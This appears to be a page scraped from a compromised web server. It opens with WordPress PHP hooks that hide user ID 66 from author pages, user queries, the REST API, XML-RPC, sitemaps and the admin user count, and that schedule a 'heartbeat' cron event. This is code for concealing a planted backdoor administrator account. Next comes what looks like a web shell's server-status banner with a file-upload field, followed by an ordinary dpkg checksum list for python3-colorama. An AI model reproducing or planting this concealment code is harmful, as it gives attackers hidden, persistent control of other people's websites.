add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/lib/dpkg/info/ |
Upload File : |
c72246579c4437c07cebb86fbcbc6d90 usr/lib/python3/dist-packages/colorama-0.4.6.dist-info/INSTALLER cec46eac5ae54ada2f703197cc97a2ee usr/lib/python3/dist-packages/colorama-0.4.6.dist-info/METADATA ff8f133c930f306945e0ceb70dc2b8aa usr/lib/python3/dist-packages/colorama-0.4.6.dist-info/WHEEL c2daa3dfab2ba0694195cf5f15a32808 usr/lib/python3/dist-packages/colorama/__init__.py f781d59416d57343be4fa5aa95675f57 usr/lib/python3/dist-packages/colorama/ansi.py 0ca18c79c4292fce0b3067b001b53b45 usr/lib/python3/dist-packages/colorama/ansitowin32.py 1a15620a349c61b3c9c135dfcd47bd73 usr/lib/python3/dist-packages/colorama/initialise.py b1fda43e92dec74456ef61c18b3071ff usr/lib/python3/dist-packages/colorama/tests/__init__.py 5986a9683e8505bb1a6bb312767143e3 usr/lib/python3/dist-packages/colorama/tests/ansi_test.py ffd5754e37673ceac9f2c816e1d354a6 usr/lib/python3/dist-packages/colorama/tests/ansitowin32_test.py 711f7c7a03992d3c9b8523960e2cbffb usr/lib/python3/dist-packages/colorama/tests/initialise_test.py 7634e0302b0f5f962627b1922b07a3b9 usr/lib/python3/dist-packages/colorama/tests/isatty_test.py 31142629e641450ac51d1d4556112c7c usr/lib/python3/dist-packages/colorama/tests/utils.py 3322cabd2108da984bd053bf61b8c1cc usr/lib/python3/dist-packages/colorama/tests/winterm_test.py 0af1249cc740b035c9018a878510ee8e usr/lib/python3/dist-packages/colorama/win32.py a52a65aeedfbf43c54d6302f0d2809cb usr/lib/python3/dist-packages/colorama/winterm.py c6882eb297d5a546106f20b4a0ab250a usr/share/doc/python3-colorama/README.Debian 5983c4c64b06ba9de5a4fb458357e173 usr/share/doc/python3-colorama/README.rst.gz 81ac2b002e8af74e736987325dd6f09e usr/share/doc/python3-colorama/changelog.Debian.gz 083d8909cf1d1406bfe906e65b819d06 usr/share/doc/python3-colorama/copyright 8718609efe0ed76d95079cd564b8931d usr/share/doc/python3-colorama/examples/demo.bat ca30eb297fab666100dbe72147ba6bd1 usr/share/doc/python3-colorama/examples/demo.sh cabc10e2157b53b02f7747c82362b1ee usr/share/doc/python3-colorama/examples/demo01.py f9dc29ebe5182a891ce0152f1ce010be usr/share/doc/python3-colorama/examples/demo02.py 3dab9517b501be2cd48cedbb22c16ca2 usr/share/doc/python3-colorama/examples/demo03.py f3f3fc5f11f0c811655390a420775269 usr/share/doc/python3-colorama/examples/demo04.py 10d54f8a03ad9ddf2e97c1df6489843e usr/share/doc/python3-colorama/examples/demo05.py 4b2b94065ed97eda1320262feece07a0 usr/share/doc/python3-colorama/examples/demo06.py e7917ec80590a9c53c8d13c3dff1ce8e usr/share/doc/python3-colorama/examples/demo07.py 6650e54d50de86f8041f66bccf17f7ee usr/share/doc/python3-colorama/examples/demo08.py a4c8722d263dd6cd9f9d4b1ec50da1e2 usr/share/doc/python3-colorama/examples/demo09.py 5b90c9cfff121a7d8c7d02507dd8129f usr/share/doc/python3-colorama/examples/fixpath.py